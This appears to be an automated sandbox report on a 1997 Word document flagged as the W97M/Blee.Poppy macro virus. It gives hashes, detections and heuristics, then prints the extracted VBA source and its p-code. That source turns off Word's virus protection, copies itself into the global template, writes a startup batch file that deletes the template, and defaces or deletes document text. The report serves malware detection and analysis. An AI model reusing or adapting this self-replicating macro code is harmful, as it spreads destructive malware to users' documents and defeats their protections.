Office (OLE) malware analysis — malicious · d99bdd64699004a1

MALICIOUS

Office (OLE)

102.5 KB Created: 1997-12-20 01:00:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: f8b2eec87ef2a695cbe10e9b9326001b SHA-1: 20e230e90f9e0ac5e28e442746f4d589ec0704b5 SHA-256: d99bdd64699004a18ff1af18ed5fd357974a4dd5c3264931da32f47c1120330e

256 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This document contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of older malware. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Doc.Trojan.Poppy-4' further confirm its malicious nature. The macros appear to be designed to execute automatically upon opening the document, likely to perform malicious actions.

Heuristics 6

ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Pivis-2
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    .VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "AutoOpen"
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
If Mrn1 = 1 Then rename$ = "AutoClose"
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	26085 bytes
SHA-256: `9f65d855b291175fe316a871828428afd04e461c9fa9c41428a6b9cd688edb71`
Detection ClamAV: Doc.Trojan.Poppy-4 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "BleeForm" Attribute VB_Base = "0{73BF054F-78B4-11D1-9F39-BF5D13A0C17C}{73BF0540-78B4-11D1-9F39-BF5D13A0C17C}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() End End Sub Private Sub CommandButton2_Click() Call BleePay End Sub Private Sub CommandButton3_Click() Selection.WholeStory Selection.Delete Unit:=wdCharacter, Count:=1 WordBasic.FileSaveAs Format:=1 End End Sub Private Sub Image1_Click() MsgBox "Blee Says.... F U C K Y O U !!!", vbCritical, "The Narkotic Network" End Sub Attribute VB_Name = "AutoOpen" Public Sub Main() 'W97M/Blee.Poppy 'By VicodinES 'Macro Virus for Word 97 '"Mad Sloppy Code For The Mad Sloppy Big Red Mess" Randomize fm = Int(Rnd * 3) + 3 Mrn1 = Int(Rnd * 8) + 1 Mrn2 = Int(Rnd * 8) + 1 Mrn3 = Int(Rnd * 8) + 1 Brn = Int(Rnd * 100) + 1 If Mrn2 = Mrn3 Then Mrn2 = Mrn2 + 1 If Mrn2 = Mrn1 Then Mrn2 = Mrn2 + 1 If Mrn2 > 8 Then Mrn2 = 0 If Mrn1 = Mrn3 Then Mrn1 = Mrn1 + 1 If Mrn1 = Mrn2 Then Mrn1 = Mrn1 + 1 If Mrn1 > 8 Then Mrn1 = 0 If Mrn3 = Mrn1 Then Mrn3 = Mrn3 + 1 If Mrn3 = Mrn2 Then Mrn3 = Mrn3 + 1 If Mrn3 > 8 Then Mrn3 = 0 If Mrn2 = Mrn3 Then Mrn2 = 0 If Mrn3 = Mrn2 Then Mrn2 = Mrn2 + 1 If Mrn1 = Mrn2 Then Mrn2 = Mrn2 + 1 If Mrn1 = 0 Then rename$ = "ToolsOptions" If Mrn1 = 1 Then rename$ = "AutoClose" If Mrn1 = 2 Then rename$ = "FileTemplates" If Mrn1 = 3 Then rename$ = "ToolsMacro" If Mrn1 = 4 Then rename$ = "AutoOpen" If Mrn1 = 5 Then rename$ = "HelpAbout" If Mrn1 = 6 Then rename$ = "AutoExec" If Mrn1 = 7 Then rename$ = "ViewVBCode" If Mrn1 = 8 Then rename$ = "AutoExit" If Mrn2 = 0 Then rename2$ = "ToolsOptions" If Mrn2 = 1 Then rename2$ = "AutoClose" If Mrn2 = 2 Then rename2$ = "FileTemplates" If Mrn2 = 3 Then rename2$ = "ToolsMacro" If Mrn2 = 4 Then rename2$ = "AutoOpen" If Mrn2 = 5 Then rename2$ = "HelpAbout" If Mrn2 = 6 Then rename2$ = "AutoExec" If Mrn2 = 7 Then rename2$ = "ViewVBCode" If Mrn2 = 8 Then rename2$ = "AutoExit" If Mrn3 = 0 Then rename3$ = "ToolsOptions" If Mrn3 = 1 Then rename3$ = "AutoClose" If Mrn3 = 2 Then rename3$ = "FileTemplates" If Mrn3 = 3 Then rename3$ = "ToolsMacro" If Mrn3 = 4 Then rename3$ = "AutoOpen" If Mrn3 = 5 Then rename3$ = "HelpAbout" If Mrn3 = 6 Then rename3$ = "AutoExec" If Mrn3 = 7 Then rename3$ = "ViewVBCode" If Mrn3 = 8 Then rename3$ = "AutoExit" If Brn = 99 Then BleeForm.Show If Brn = 99 Then GoTo Hell If Brn = 11 Then Call BleePay With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With On Error Resume Next ok$ = 0 Soma$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10)) nfat = GetAttr(NormalTemplate.FullName) If nfat = vbReadOnly Then Call vBitchES("c:\windows\startm~1\programs\startup\msfile.bat") If nfat = vbReadOnly + vbArchive Then Call vBitchES("c:\windows\startm~1\programs\startup\msfile.bat") If nfat = vbReadOnly Then GoTo fuckoff If nfat = vbReadOnly + vbArchive Then GoTo fuckoff If Soma$ = UCase(NormalTemplate) Then ao$ = WordBasic.[MacroName$](fm, 0) fat = GetAttr(ActiveDocument.FullName) If fat >= vbArchive Then ok$ = 1 If fat >= vbSystem Then ok$ = 1 If fat >= vbHidden Then ok$ = 1 If ok$ = 1 Then Application.OrganizerCopy Source:= _ NormalTemplate.FullName, Destination:= _ ActiveDocument.FullName, Name:="BleeForm", Object:= _ wdOrganizerObjectProjectItems If rename$ = "AutoOpen" Then backup$ = "VicodinES" If rename2$ = "AutoOpen" Then backup$ = "VicodinES" If ao$ = "AutoOpen" Then backup$ = "VicodinES" If backup$ <> "VicodinES" Then backup$ = "AutoOpen" For X = 1 To 3 If X = 1 Then Mac$ = rename$ If X = 2 Then Mac$ = rename2$ If X = 3 Then Mac$ = backup$ Application.OrganizerCopy Source:= _ NormalTemplate.FullName, Destination:= _ ActiveDocument.FullName, Name:=ao$, Object:= _ wdOrganizerObjectProjectItems Application.OrganizerRename Source:= _ ActiveDocument.FullName, Name:=ao$, _ NewName:=Mac$, Object:= _ wdOrganizerObjectProjectItems Next X Application.OrganizerCopy Source:= _ NormalTemplate.FullName, Destination:= _ ActiveDocument.FullName, Name:=ao$, Object:= _ wdOrganizerObjectProjectItems WordBasic.FileSaveAs Format:=1 WordBasic.SetDocumentDirty 0 End If Else ao$ = "AutoOpen" Application.OrganizerCopy Source:= _ ActiveDocument.FullName, Destination:= _ NormalTemplate.FullName, Name:="BleeForm", Object:= _ wdOrganizerObjectProjectItems For X = 1 To 3 If X = 1 Then Mac$ = rename$ If X = 2 Then Mac$ = rename2$ If X = 3 Then Mac$ = rename3$ Application.OrganizerCopy Source:= _ ActiveDocument.FullName, Destination:= _ NormalTemplate.FullName, Name:=ao$, Object:= _ wdOrganizerObjectProjectItems Application.OrganizerRename Source:= _ NormalTemplate.FullName, Name:=ao$, _ NewName:=Mac$, Object:= _ wdOrganizerObjectProjectItems Next X Application.OrganizerCopy Source:= _ ActiveDocument.FullName, Destination:= _ NormalTemplate.FullName, Name:=ao$, Object:= _ wdOrganizerObjectProjectItems End If With ActiveDocument .ReadOnlyRecommended = False .Password = "" .WritePassword = "" End With GoTo fuckoff Hell: fuckoff: On Error GoTo -1: On Error GoTo 0 End Sub Sub BleePay() Selection.Find.ClearFormatting Selection.Find.Replacement.ClearFormatting With Selection.Find .Text = "he" .Replacement.Text = " The Mighty Blee " .Forward = True .Wrap = wdFindContinue .Format = False .MatchCase = False .MatchWholeWord = False .MatchWildcards = False .MatchSoundsLike = False .MatchAllWordForms = False End With Selection.Find.Execute Replace:=wdReplaceAll WordBasic.FileSaveAs Format:=1 End Sub Sub vBitchES(strFile As String) Dim hFile As Long n$ = NormalTemplate Part1$ = "@echo off" Part11$ = "attrib -h -r " snag$ = "c:\progra~1\micros~1\templa~1\" snag1$ = "c:\progra~1\micros~2\templa~1\" Part2$ = "del " Part33$ = "cls" Part333$ = "c:\windows\startm~1\programs\startup\msfile.bat" hFile = FreeFile Open strFile For Output Access Write As hFile Print #hFile, Part1$ Print #hFile, Part11$ + snag$ + n$ Print #hFile, Part11$ + snag1$ + n$ Print #hFile, Part2$ + snag$ + n$ Print #hFile, Part2$ + snag1$ + n$ Print #hFile, Part33$ Print #hFile, Part2$ + Part333$ Close hFile GoTo Hell Hell: End Sub ' Processing file: /tmp/qstore__qj1tmng ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1190 bytes ' Macros/VBA/BleeForm - 2938 bytes ' Line #0: ' Line #1: ' Line #2: ' Line #3: ' Line #4: ' Line #5: ' Line #6: ' Line #7: ' Line #8: ' Line #9: ' Line #10: ' Line #11: ' Line #12: ' Line #13: ' Line #14: ' Line #15: ' Line #16: ' Line #17: ' Line #18: ' Line #19: ' Line #20: ' Line #21: ' Line #22: ' Line #23: ' Line #24: ' Line #25: ' Line #26: ' Line #27: ' Line #28: ' Line #29: ' FuncDefn (Private Sub CommandButton1_Click()) ' Line #30: ' End ' Line #31: ' EndSub ' Line #32: ' Line #33: ' FuncDefn (Private Sub CommandButton2_Click()) ' Line #34: ' ArgsCall (Call) BleePay 0x0000 ' Line #35: ' EndSub ' Line #36: ' Line #37: ' FuncDefn (Private Sub CommandButton3_Click()) ' Line #38: ' Ld Selection ' ArgsMemCall WholeStory 0x0000 ' Line #39: ' Ld wdCharacter ' ParamNamed Unit ' LitDI2 0x0001 ' ParamNamed Count ' Ld Selection ' ArgsMemCall Delete 0x0002 ' Line #40: ' LitDI2 0x0001 ' ParamNamed Format$ ' Ld WordBasic ' ArgsMemCall FileSaveAs 0x0001 ' Line #41: ' End ' Line #42: ' EndSub ' Line #43: ' Line #44: ' FuncDefn (Private Sub Image1_Click()) ' Line #45: ' LitStr 0x0025 "Blee Says.... F U C K Y O U !!!" ' Ld vbCritical ' LitStr 0x0014 "The Narkotic Network" ' ArgsCall MsgBox 0x0003 ' Line #46: ' EndSub ' Macros/VBA/AutoOpen - 15973 bytes ' Line #0: ' FuncDefn (Public Sub Main()) ' Line #1: ' Line #2: ' QuoteRem 0x0000 0x000F "W97M/Blee.Poppy" ' Line #3: ' QuoteRem 0x0000 0x000C "By VicodinES" ' Line #4: ' QuoteRem 0x0000 0x0017 "Macro Virus for Word 97" ' Line #5: ' QuoteRem 0x0000 0x0031 ""Mad Sloppy Code For The Mad Sloppy Big Red Mess"" ' Line #6: ' Line #7: ' ArgsCall Read 0x0000 ' Line #8: ' Line #9: ' Ld Rnd ' LitDI2 0x0003 ' Mul ' FnInt ' LitDI2 0x0003 ' Add ' St fm ' Line #10: ' Line #11: ' Ld Rnd ' LitDI2 0x0008 ' Mul ' FnInt ' LitDI2 0x0001 ' Add ' St Mrn1 ' Line #12: ' Ld Rnd ' LitDI2 0x0008 ' Mul ' FnInt ' LitDI2 0x0001 ' Add ' St Mrn2 ' Line #13: ' Ld Rnd ' LitDI2 0x0008 ' Mul ' FnInt ' LitDI2 0x0001 ' Add ' St Mrn3 ' Line #14: ' Ld Rnd ' LitDI2 0x0064 ' Mul ' FnInt ' LitDI2 0x0001 ' Add ' St Brn ' Line #15: ' Line #16: ' Ld Mrn2 ' Ld Mrn3 ' Eq ' If ' BoSImplicit ' Ld Mrn2 ' LitDI2 0x0001 ' Add ' St Mrn2 ' EndIf ' Line #17: ' Ld Mrn2 ' Ld Mrn1 ' Eq ' If ' BoSImplicit ' Ld Mrn2 ' LitDI2 0x0001 ' Add ' St Mrn2 ' EndIf ' Line #18: ' Ld Mrn2 ' LitDI2 0x0008 ' Gt ' If ' BoSImplicit ' LitDI2 0x0000 ' St Mrn2 ' EndIf ' Line #19: ' Line #20: ' Ld Mrn1 ' Ld Mrn3 ' Eq ' If ' BoSImplicit ' Ld Mrn1 ' LitDI2 0x0001 ' Add ' St Mrn1 ' EndIf ' Line #21: ' Ld Mrn1 ' Ld Mrn2 ' Eq ' If ' BoSImplicit ' Ld Mrn1 ' LitDI2 0x0001 ' Add ' St Mrn1 ' EndIf ' Line #22: ' Ld Mrn1 ' LitDI2 0x0008 ' Gt ' If ' BoSImplicit ' LitDI2 0x0000 ' St Mrn1 ' EndIf ' Line #23: ' Line #24: ' Ld Mrn3 ' Ld Mrn1 ' Eq ' If ' BoSImplicit ' Ld Mrn3 ' LitDI2 0x0001 ' Add ' St Mrn3 ' EndIf ' Line #25: ' Ld Mrn3 ' Ld Mrn2 ' Eq ' If ' BoSImplicit ' Ld Mrn3 ' LitDI2 0x0001 ' Add ' St Mrn3 ' EndIf ' Line #26: ' Ld Mrn3 ' LitDI2 0x0008 ' Gt ' If ' BoSImplicit ' LitDI2 0x0000 ' St Mrn3 ' EndIf ' Line #27: ' Line #28: ' Ld Mrn2 ' Ld Mrn3 ' Eq ' If ' BoSImplicit ' LitDI2 0x0000 ' St Mrn2 ' EndIf ' Line #29: ' Ld Mrn3 ' Ld Mrn2 ' Eq ' If ' BoSImplicit ' Ld Mrn2 ' LitDI2 0x0001 ' Add ' St Mrn2 ' EndIf ' Line #30: ' Ld Mrn1 ' Ld Mrn2 ' Eq ' If ' BoSImplicit ' Ld Mrn2 ' LitDI2 0x0001 ' Add ' St Mrn2 ' EndIf ' Line #31: ' Line #32: ' Line #33: ' Ld Mrn1 ' LitDI2 0x0000 ' Eq ' If ' BoSImplicit ' LitStr 0x000C "ToolsOptions" ' St rename$ ' EndIf ' Line #34: ' Ld Mrn1 ' LitDI2 0x0001 ' Eq ' If ' BoSImplicit ' LitStr 0x0009 "AutoClose" ' St rename$ ' EndIf ' Line #35: ' Ld Mrn1 ' LitDI2 0x0002 ' Eq ' If ' BoSImplicit ' LitStr 0x000D "FileTemplates" ' St rename$ ' EndIf ' Line #36: ' Ld Mrn1 ' LitDI2 0x0003 ' Eq ' If ' BoSImplicit ' LitStr 0x000A "ToolsMacro" ' St rename$ ' EndIf ' Line #37: ' Ld Mrn1 ' LitDI2 0x0004 ' Eq ' If ' BoSImplicit ' LitStr 0x0008 "AutoOpen" ' St rename$ ' EndIf ' Line #38: ' Ld Mrn1 ' LitDI2 0x0005 ' Eq ' If ' BoSImplicit ' LitStr 0x0009 "HelpAbout" ' St rename$ ' EndIf ' Line #39: ' Ld Mrn1 ' LitDI2 0x0006 ' Eq ' If ' BoSImplicit ' LitStr 0x0008 "AutoExec" ' St rename$ ' EndIf ' Line #40: ' Ld Mrn1 ' LitDI2 0x0007 ' Eq ' If ' BoSImplicit ' LitStr 0x000A "ViewVBCode" ' St rename$ ' EndIf ' Line #41: ' Ld Mrn1 ' LitDI2 0x0008 ' Eq ' If ' BoSImplicit ' LitStr 0x0008 "AutoExit" ' St rename$ ' EndIf ' Line #42: ' Line #43: ' Ld Mrn2 ' LitDI2 0x0000 ' Eq ' If ' BoSImplicit ' LitStr 0x000C "ToolsOptions" ' St rename2$ ' EndIf ' Line #44: ' Ld Mrn2 ' LitDI2 0x0001 ' Eq ' If ' BoSImplicit ' LitStr 0x0009 "AutoClose" ' St rename2$ ' EndIf ' Line #45: ' Ld Mrn2 ' LitDI2 0x0002 ' Eq ' If ' BoSImplicit ' LitStr 0x000D "FileTemplates" ' St rename2$ ' EndIf ' Line #46: ' Ld Mrn2 ' LitDI2 0x0003 ' Eq ' If ' BoSImplicit ' LitStr 0x000A "ToolsMacro" ' St rename2$ ' EndIf ' Line #47: ' Ld Mrn2 ' LitDI2 0x0004 ' Eq ' If ' BoSImplicit ' LitStr 0x0008 "AutoOpen" ' St rename2$ ' EndIf ' Line #48: ' Ld Mrn2 ' LitDI2 0x0005 ' Eq ' If ' BoSImplicit ' LitStr 0x0009 "HelpAbout" ' St rename2$ ' EndIf ' Line #49: ' Ld Mrn2 ' LitDI2 0x0006 ' Eq ' If ' BoSImplicit ' LitStr 0x0008 "AutoExec" ' St rename2$ ' EndIf ' Line #50: ' Ld Mrn2 ' LitDI2 0x0007 ' Eq ' If ' BoSImplicit ' LitStr 0x000A "ViewVBCode" ' St rename2$ ' EndIf ' Line #51: ' Ld Mrn2 ' LitDI2 0x0008 ' Eq ' If ' BoSImplicit ' LitStr 0x0008 "AutoExit" ' St rename2$ ' EndIf ' Line #52: ' Line #53: ' Line #54: ' Ld Mrn3 ' LitDI2 0x0000 ' Eq ' If ' BoSImplicit ' LitStr 0x000C "ToolsOptions" ' St rename3$ ' EndIf ' Line #55: ' Ld Mrn3 ' LitDI2 0x0001 ' Eq ' If ' BoSImplicit ' LitStr 0x0009 "AutoClose" ' St rename3$ ' EndIf ' Line #56: ' Ld Mrn3 ' LitDI2 0x0002 ' Eq ' If ' BoSImplicit ' LitStr 0x000D "FileTemplates" ' St rename3$ ' EndIf ' Line #57: ' Ld Mrn3 ' LitDI2 0x0003 ' Eq ' If ' BoSImplicit ' LitStr 0x000A "ToolsMacro" ' St rename3$ ' EndIf ' Line #58: ' Ld Mrn3 ' LitDI2 0x0004 ' Eq ' If ' BoSImplicit ' LitStr 0x0008 "AutoOpen" ' St rename3$ ' EndIf ' Line #59: ' Ld Mrn3 ' LitDI2 0x0005 ' Eq ' If ' BoSImplicit ' LitStr 0x0009 "HelpAbout" ' St rename3$ ' EndIf ' Line #60: ' Ld Mrn3 ' LitDI2 0x0006 ' Eq ' If ' BoSImplicit ' LitStr 0x0008 "AutoExec" ' St rename3$ ' EndIf ' Line #61: ' Ld Mrn3 ' LitDI2 0x0007 ' Eq ' If ' BoSImplicit ' LitStr 0x000A "ViewVBCode" ' St rename3$ ' EndIf ' Line #62: ' Ld Mrn3 ' LitDI2 0x0008 ' Eq ' If ' BoSImplicit ' LitStr 0x0008 "AutoExit" ' St rename3$ ' EndIf ' Line #63: ' Line #64: ' Ld Brn ' LitDI2 0x0063 ' Eq ' If ' BoSImplicit ' Ld BleeForm ' ArgsMemCall Show 0x0000 ' EndIf ' Line #65: ' Ld Brn ' LitDI2 0x0063 ' Eq ' If ' BoSImplicit ' GoTo Hell ' EndIf ' Line #66: ' Ld Brn ' LitDI2 0x000B ' Eq ' If ' BoSImplicit ' ArgsCall (Call) BleePay 0x0000 ' EndIf ' Line #67: ' Line #68: ' Line #69: ' StartWithExpr ' Ld Options ' With ' Line #70: ' LitVarSpecial (False) ' MemStWith ConfirmConversions ' Line #71: ' LitVarSpecial (False) ' MemStWith VirusProtection ' Line #72: ' LitVarSpecial (False) ' MemStWith SaveNormalPrompt ' Line #73: ' EndWith ' Line #74: ' Line #75: ' OnError (Resume Next) ' Line #76: ' Line #77: ' Line #78: ' LitDI2 0x0000 ' St ok$ ' Line #79: ' Line #80: ' LitDI2 0x0000 ' Ld WordBasic ' ArgsMemLd [MacroName$] 0x0001 ' Ld WordBasic ' ArgsMemLd [MacroFileName$] 0x0001 ' LitDI2 0x000A ' Ld WordBasic ' ArgsMemLd [Right$] 0x0002 ' ArgsLd UCase 0x0001 ' St Soma$ ' Line #81: ' Line #82: ' Ld NormalTemplate ' MemLd FullName ' ArgsLd GetAttr 0x0001 ' St nfat ' Line #83: ' Line #84: ' Ld nfat ' Ld vbReadOnly ' Eq ' If ' BoSImplicit ' LitStr 0x002F "c:\windows\startm~1\programs\startup\msfile.bat" ' ArgsCall (Call) vBitchES 0x0001 ' EndIf ' Line #85: ' Ld nfat ' Ld vbReadOnly ' Ld vbArchive ' Add ' Eq ' If ' BoSImplicit ' LitStr 0x002F "c:\windows\startm~1\programs\startup\msfile.bat" ' ArgsCall (Call) vBitchES 0x0001 ' EndIf ' Line #86: ' Line #87: ' Ld nfat ' Ld vbReadOnly ' Eq ' If ' BoSImplicit ' GoTo fuckoff ' EndIf ' Line #88: ' Ld nfat ' Ld vbReadOnly ' Ld vbArchive ' Add ' Eq ' If ' BoSImplicit ' GoTo fuckoff ' EndIf ' Line #89: ' Line #90: ' Ld Soma$ ' Ld NormalTemplate ' ArgsLd UCase 0x0001 ' Eq ' IfBlock ' Line #91: ' Line #92: ' Ld fm ' LitDI2 0x0000 ' Ld WordBasic ' ArgsMemLd [MacroName$] 0x0002 ' St ao$ ' Line #93: ' Ld ActiveDocument ' MemLd FullName ' ArgsLd GetAttr 0x0001 ' St fat ' Line #94: ' Line #95: ' Ld fat ' Ld vbArchive ' Ge ' If ' BoSImplicit ' LitDI2 0x0001 ' St ok$ ' EndIf ' Line #96: ' Ld fat ' Ld vbSystem ' Ge ' If ' BoSImplicit ' LitDI2 0x0001 ' St ok$ ' EndIf ' Line #97: ' Ld fat ' Ld vbHidden ' Ge ' If ' BoSImplicit ' LitDI2 0x0001 ' St ok$ ' EndIf ' Line #98: ' Line #99: ' Ld ok$ ' LitDI2 0x0001 ' Eq ' IfBlock ' Line #100: ' Line #101: ' LineCont 0x000C 05 00 08 00 0B 00 08 00 15 00 08 00 ' Ld NormalTemplate ' MemLd FullName ' ParamNamed Source ' Ld ActiveDocument ' MemLd FullName ' ParamNamed Destination ' LitStr 0x0008 "BleeForm" ' ParamNamed New ' Ld wdOrganizerObjectProjectItems ' ParamNamed On ' Ld Application ' ArgsMemCall OrganizerCopy 0x0004 ' Line #102: ' Line #103: ' Ld rename$ ' LitStr 0x0008 "AutoOpen" ' Eq ' If ' BoSImplicit ' LitStr 0x0009 "VicodinES" ' St backup$ ' EndIf …

Open this report in the interactive analyzer, or submit your own file for analysis.